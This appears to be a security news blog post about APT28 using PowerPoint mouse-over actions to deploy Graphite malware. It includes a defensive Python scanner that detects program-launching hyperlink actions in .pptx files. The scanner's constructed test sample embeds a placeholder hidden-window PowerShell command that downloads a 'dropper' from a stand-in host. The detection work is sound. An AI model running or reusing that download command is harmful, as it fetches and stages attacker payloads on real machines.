Fancy Bear Strikes Again: New Mouse Movement Exploit in PowerPoint Unleashes Graphite Malware

Fancy Bear, aka APT28, is back with a devious twist: deploying Graphite malware through the mouse-over action in MS PowerPoint files. Moving the cursor over a rigged element while the deck is in presentation mode runs a PowerShell script that downloads and executes a malicious dropper. The technique abuses a built-in PowerPoint feature rather than a software vulnerability, so patching alone will not stop it. This Russian state-sponsored group is targeting the government and defense sectors. Beware of unexpected presentations: your mouse might be plotting against you!


Hot Take:

Fancy Bear is back, proving that even the Russian military intelligence unit can’t resist the PowerPoint addiction. Instead of boring slides, they’ve added a touch of malware to keep things spicy. Who knew mouse movements could be so dangerous? Next time you’re in a meeting, keep an eye on that cursor—it might be up to no good!

Key Points:

  • Fancy Bear (APT28) is abusing PowerPoint's mouse-over hyperlink action, a legitimate feature rather than a vulnerability, to run code when the victim hovers over an element in slideshow mode.
  • That action launches a PowerShell script, which fetches a dropper from OneDrive and executes it.
  • The final payload is a variant of the Graphite malware, which uses the Microsoft Graph API and OneDrive for command and control.
  • The campaign uses a lure document tied to the OECD.
  • Targets include government and defense entities in Europe and Eastern Europe.
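For defenders who want to triage decks before anyone presents them, here is an added example (written for this post, not code from the original page, from the reporting it summarizes, or from the attackers) that scans a .pptx for hyperlink actions of type `ppaction://program`, which is how PowerPoint stores a "run program" click or mouse-over action. The assumption is that the campaign's mouse-movement trigger is this standard action mechanism; the sample deck the scanner runs against is built in memory and is a constructed stand-in, and the PowerShell command line inside it is a hypothetical placeholder, not the real lure's content.

```python
"""Scan .pptx files for hyperlink actions that launch a program.

A .pptx is a zip of XML parts. A shape or text run can carry an
<a:hlinkClick>, <a:hlinkHover> or <a:hlinkMouseOver> element; when its
action attribute is "ppaction://program", PowerPoint runs an external
program on click or hover in slideshow mode. The command line is stored
as the Target of the referenced r:id in the slide's .rels part.
"""
import io
import sys
import zipfile
import xml.etree.ElementTree as ET
from posixpath import basename, dirname, join
from xml.sax.saxutils import quoteattr

NS_A = "http://schemas.openxmlformats.org/drawingml/2006/main"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_P = "http://schemas.openxmlformats.org/presentationml/2006/main"
NS_REL = "http://schemas.openxmlformats.org/package/2006/relationships"
PROGRAM_ACTION = "ppaction://program"
TRIGGERS = ("hlinkClick", "hlinkHover", "hlinkMouseOver")


def _load_rels(zf, part_name):
    """Map relationship Id -> Target for a slide part (empty if it has none)."""
    rels_name = join(dirname(part_name), "_rels", basename(part_name) + ".rels")
    try:
        root = ET.fromstring(zf.read(rels_name))
    except KeyError:
        return {}
    return {rel.get("Id"): rel.get("Target")
            for rel in root.iter(f"{{{NS_REL}}}Relationship")}


def find_program_actions(pptx_bytes):
    """Return (slide part, trigger element, command) for every 'run program' action."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(pptx_bytes)) as zf:
        slides = sorted(n for n in zf.namelist()
                        if n.startswith("ppt/slides/slide") and n.endswith(".xml"))
        for slide in slides:
            rels = _load_rels(zf, slide)
            root = ET.fromstring(zf.read(slide))
            for trigger in TRIGGERS:
                for link in root.iter(f"{{{NS_A}}}{trigger}"):
                    if link.get("action") != PROGRAM_ACTION:
                        continue  # ordinary hyperlink or slide jump, not a program launch
                    target = rels.get(link.get(f"{{{NS_R}}}id"), "<unresolved r:id>")
                    findings.append((slide, trigger, target))
    return findings


def build_sample_pptx(target, trigger="hlinkHover", action=PROGRAM_ACTION):
    """Constructed test input: a minimal one-slide deck whose picture carries a
    hyperlink action. Not a real lure; only the parts the scanner reads exist."""
    action_attr = f" action={quoteattr(action)}" if action else ""
    slide_xml = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sld xmlns:a="{NS_A}" xmlns:r="{NS_R}" xmlns:p="{NS_P}">
  <p:cSld><p:spTree>
    <p:pic><p:nvPicPr>
      <p:cNvPr id="4" name="Picture 3"><a:{trigger} r:id="rId2"{action_attr}/></p:cNvPr>
    </p:nvPicPr></p:pic>
  </p:spTree></p:cSld>
</p:sld>"""
    rels_xml = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{NS_REL}">
  <Relationship Id="rId2" Type="{NS_R}/hyperlink" Target={quoteattr(target)} TargetMode="External"/>
</Relationships>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("ppt/slides/slide1.xml", slide_xml)
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels_xml)
    return buf.getvalue()


# Hypothetical placeholder for whatever command line a real lure would carry.
SAMPLE_COMMAND = 'powershell.exe -nop -w hidden -c "iwr https://onedrive.invalid/dropper -OutFile d.bin"'

if __name__ == "__main__":
    # Usage: python scan_pptx.py deck1.pptx deck2.pptx ... (no args: scan the constructed sample)
    blobs = [open(p, "rb").read() for p in sys.argv[1:]] or [build_sample_pptx(SAMPLE_COMMAND)]
    for blob in blobs:
        for slide, trigger, cmd in find_program_actions(blob):
            print(f"{slide}: {trigger} action runs: {cmd}")
```

Any hit from this scanner deserves a look, since ordinary presentations link to URLs or other slides, not to command lines; an unresolved r:id is also worth flagging, because it means the action points outside the parts the scanner could read.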

The Nimble Nerd